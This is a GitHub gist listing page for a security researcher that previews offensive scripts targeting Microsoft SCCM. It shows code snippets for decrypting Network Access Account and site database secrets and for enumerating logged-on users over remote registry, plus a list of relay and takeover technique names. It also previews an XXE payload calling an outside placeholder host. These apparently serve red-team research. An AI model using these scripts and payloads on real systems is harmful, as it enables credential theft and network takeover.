Chris Thompson Mayyhem
Mayyhem
/ Get-SCCMCollectionLDAP
Last active
January 30, 2025 18:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-SCCMCollectionLDAP { | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Mandatory=$true)] | |
| [string]$DomainFQDN | |
| ) | |
| # Import Active Directory module | |
| Import-Module ActiveDirectory |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-SiteServerRegData { | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Mandatory=$true)] | |
| [string]$ComputerName | |
| ) | |
| # Access the remote registry | |
| $RegPath = "SOFTWARE\Microsoft\SMS" | |
| $SubKey = "Triggers" |
Mayyhem
/ Get-RegPermissions.ps1
Created
January 22, 2025 21:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-RegPermissions { | |
| param ( | |
| [Parameter(Mandatory=$true)] | |
| [string]$RegistryPath, | |
| [Parameter(Mandatory=$false)] | |
| [string]$ComputerName = $env:COMPUTERNAME | |
| ) | |
| function Convert-RegRights { | |
| param($Rights) |
Mayyhem
/ Get-SiteServerCurrentUser.ps1
Last active
June 26, 2025 23:19
Query SCCM site server remote registry for the currently logged on user account
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-SiteServerCurrentUser { | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Mandatory=$true)] | |
| [string]$ComputerName, | |
| [Parameter(Mandatory=$false)] | |
| [string]$SubKeyPath = "SOFTWARE\Microsoft\SMS\CurrentUser" | |
| ) |
Mayyhem
/ DecryptSccmSecret.ps1
Last active
February 11, 2025 12:55
Use the site server to decrypt strings in the site database (e.g., SC_UserAccount). Doesn't work in hierarchies with a passive site server.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Load the DLL | |
| Add-Type -Path "C:\Program Files\Microsoft Configuration Manager\bin\X64\Microsoft.ConfigurationManager.ManagedBase.dll" | |
| function Invoke-Decrypt { | |
| [CmdletBinding()] | |
| param ( | |
| [Parameter(Mandatory = $true, Position = 0)] | |
| [string]$Hex, | |
| [Parameter(Mandatory = $false)] |
Mayyhem
/ sccm_dump_naa_powershell.txt
Last active
September 24, 2024 15:45
sccm_dump_naa_powershell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $SCCMSecret = (Get-CimInstance -ClassName ccm_networkaccessaccount -Namespace root\ccm\policy\machine\actualconfig) | |
| foreach ($secret in $SCCMSecret) { | |
| $encodedstring = $secret.NetworkAccessUserName.split('[')[2].split(']')[0] | |
| $ByteArrayLength = $EncodedString.Length / 2 - 4 | |
| $array = New-Object Byte[] ($EncodedString.Length / 2) | |
| [System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null | |
| for ($i = 0; $i -lt ($EncodedString.Length / 2 - 4); $i++) { | |
| $array[$i] = [System.Convert]::ToByte(($EncodedString.Substring(($i + 4) * 2, 2)), 16)} | |
| $Decryptedvalue = [System.Text.Encoding]::Unicode.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($array, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)) | |
| Write-Host("Decrypted NetworkAccess Account Username = $Decryptedvalue") |
Mayyhem
/ Techniques_in_MisconfigurationManager.ps1
Created
April 10, 2024 21:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ELEVATE‑1 Relay to Site System (SMB) | |
| ELEVATE‑2 Relay Client Push Installation (Heartbeat Discovery) | |
| ELEVATE-3 Relay Client Push Installation (AD Discovery) | |
| TAKEOVER‑1 Relay to Site DB (MSSQL) | |
| TAKEOVER‑2 Relay to Site DB (SMB) | |
| TAKEOVER‑3 Relay to AD CS | |
| TAKEOVER‑4 Relay CAS to Child | |
| TAKEOVER‑5 Relay to AdminService | |
| TAKEOVER‑6 Relay to SMS Provider (SMB) | |
| TAKEOVER‑7 Relay Between HA |
Mayyhem
/ Get-LoggedOn.py
Created
November 2, 2023 17:26
— forked from GeisericII/Get-LoggedOn.py
Stupid simple script copied and pasted from reg.py/lookupsid and inspired from itm4n's session enum via registry
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from __future__ import division | |
| from __future__ import print_function | |
| import re | |
| import codecs | |
| import logging | |
| import time | |
| import argparse | |
| import sys | |
| from impacket import version |
Mayyhem
/ sccmdecryptpoc.cs
Created
August 18, 2023 01:45
— forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;) | |
| // Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work. | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| namespace SCCMDecryptPOC | |
| { | |
| internal class Program |
Mayyhem
/ XXE_payloads
Created
February 9, 2023 18:49
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |